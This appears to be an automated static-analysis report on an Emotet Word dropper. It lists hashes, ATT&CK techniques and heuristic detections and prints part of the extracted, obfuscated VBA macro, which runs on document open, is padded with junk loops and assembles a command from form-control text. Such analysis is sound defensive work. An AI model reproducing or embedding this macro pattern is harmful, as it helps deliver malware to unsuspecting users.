Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 abffd9f417afcbcd…

MALICIOUS

Office (OLE)

Size: 179.4 KB
Created: 2019-12-11 20:44:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 1962df7ba5ae27f1168fd5be11f2f210
SHA-1: 960ad880a6bfc20339ea850118765d3a65d7ab39
SHA-256: abffd9f417afcbcd4ebf00f102fbfe6f45ebfc4ce14815326ccb910dfd782cd1
Risk score: 322

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter
  • T1105 Ingress Tool Transfer

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Emotet-7446532-0'. Static analysis reveals a VBA macro within the 'Document_open' subroutine. This macro utilizes `CreateObject` and WMI (`winmgmts`) to launch a process, a common technique for downloading and executing secondary payloads. The obfuscation of 'winmgmts' from split string literals further indicates malicious intent.

Heuristics (8)

  • ClamAV: Doc.Dropper.Emotet-7446532-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Emotet-7446532-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 5 related findings)
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] (OLE_VBA_WMI_PROCESS_CREATE)
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] (OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7767 bytes
SHA-256: 0a34e6541a28c8152a49011e462594294a8176798b75d63f7131e2c355ee4517
First 1,000 lines of the extracted script
Attribute VB_Name = "Zzbhpyvzjapvn"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Dfsxmommomcw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Pfdegvrzwad = Qqiuciwkry To 0
         Wkkvmzjh = (13 - Atn(51) - (44 + Round(41) * Gkghpbavpylaq / CInt(1)))
    Select Case Obareyhadkl
      Case Kauxztjx
         Svkwjdqvtyhy = CLng(Pjyzjcxetw)
         Enbxbqahhvt = Oct(Wnosjwlckhpuk)
      Case Wobnluzctv
         Yqctpwanpjm = Ymtfmdrc
         Sufqdxkvwm = Int(29)
   End Select
Next
   For Rbbxralsfhtmc = Vqcyekacnwh To 0
         Idozgszrlnyy = (13 - Atn(51) - (44 + Round(41) * Mupidzzc / CInt(1)))
    Select Case Jolqyobkiuj
      Case Tfkwvkcdzekn
         Nesrfgbqshisw = CLng(Qgqkbvdtcds)
         Jjbcpqngpc = Oct(Rdncncnqpjytc)
      Case Kkpnmlrg
         Gdgyiadmo = Pqoafduzlhzi
         Vaoskzwf = Int(29)
   End Select
Next
   For Qfxvjnnlzm = Ifavfwjn To 0
         Kncypwagq = (13 - Atn(51) - (44 + Round(41) * Ryeagucj / CInt(1)))
    Select Case Tdgeikenpz
      Case Jukslxqltwg
         Hwvzcgdmxqj = CLng(Glwsbdsbojpn)
         Twpxxgnbo = Oct(Nshcmdawsqf)
      Case Vchosmfl
         Kqhslpff = Eollzcfpqqo
         Pcvzzibdc = Int(29)
   End Select
Next
Dklvjiocxj
End Sub

Attribute VB_Name = "Hgswgbwtxfs"
Attribute VB_Base = "0{AE918360-1600-4D7F-8D9B-C79E96F20746}{1DFEF283-E789-44C7-B975-D99DF9032484}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Yjxweksts"
Function Ruxhnwdfq()
   For Ulnwebwudsmjm = Txouozij To 0
         Ahwwrslam = (13 - Atn(51) - (44 + Round(41) * Djkjvzjdvsf / CInt(1)))
    Select Case Rbwuoalbrpd
      Case Ylzajaznqndlt
         Gzovthepwqmmo = CLng(Ugovaxdujf)
         Bosjvamu = Oct(Ibstvdjx)
      Case Betxwxycdf
         Ffdbehqmbrt = Nchbaklrcawvv
         Bkrmwtvnquycg = Int(29)
   End Select
Next
Juentcyhgac = Zzbhpyvzjapvn.Dfsxmommomcw
   For Rzbjircoxjqmf = Ivndduwqjwn To 0
         Qysapowiid = (13 - Atn(51) - (44 + Round(41) * Katrszkfwsku / CInt(1)))
    Select Case Duismuisy
      Case Pxqrezraktu
         Qwddnynxlikbz = CLng(Skrbuzcctns)
         Tfoirjbqqefa = Oct(Epgpekbizcti)
      Case Ukpvguegtbk
         Abgmbjgxnmy = Rkfmpjknv
         Kuqoyvefowa = Int(29)
   End Select
Next
Ifaojchz = Juentcyhgac + Hgswgbwtxfs.Sopbjkezvlra + Hgswgbwtxfs.Stxynhxh + Hgswgbwtxfs.Wgyhveophhip
   For Gwaeoprovs = Ofpdztyuib To 0
         Cfmsrfziny = (13 - Atn(51) - (44 + Round(41) * Rlajrzpxf / CInt(1)))
    Select Case Lzbqsvfderrcj
      Case Wpsbvpgklotpc
         Heagbsqogm = CLng(Uoairhscafeh)
         Pqczgcusj = Oct(Cafgblon)
      Case Wkfbhkglca
         Xdalhgfbcengo = Vytptqstfx
         Snggnifdcgpeh = Int(29)
   End Select
Next
Rnnxdquvtnjbd = Ifaojchz + Hgswgbwtxfs.Kjyooqae + Hgswgbwtxfs.Zvjrloay.ControlTipText
   For Caxojfqdit = Sthjyhahiqd To 0
         Qbkxlxpevltal = (13 - Atn(51) - (44 + Round(41) * Wruatxqdadqq / CInt(1)))
    Select Case Bmwwstdggx
      Case Lwiojmnhkrvd
         Zyjtvheuuzwet = CLng(Qlxdzluvmud)
         Zkqtottf = Oct(Cporbirftm)
      Case Gyzinedxzrec
         Idqagjtyvo = Smvpkpieestf
         Cznkkmwrano = Int(29)
   End Select
Next
Ruxhnwdfq = Yqxewpxws + Rnnxdquvtnjbd + Yqxewpxws
   For Higspbdws = Wawbhsqgdtmq To 0
         Bjcasyhknkzu = (13 - Atn(51) - (44 + Round(41) * Dqmxjaqjeawoz / CInt(1)))
    Select Case Ovrjznrbwaxn
      Case Lcnoudngph
         Sfcdeztr = CLng(Hkdjloqxmme)
         Xjzflfhfjmyu = Oct(Swxuunwuclkry)
      Case Vjwwneteuhlr
         Yepzpyaoskivd = Uuhrnoccxyv
         Dnjvmvdhvrjr = Int(29)
   End Select
Next
End Function
Function Dklvjiocxj()
   For Bvniinkaejyce = Qzu
... (truncated)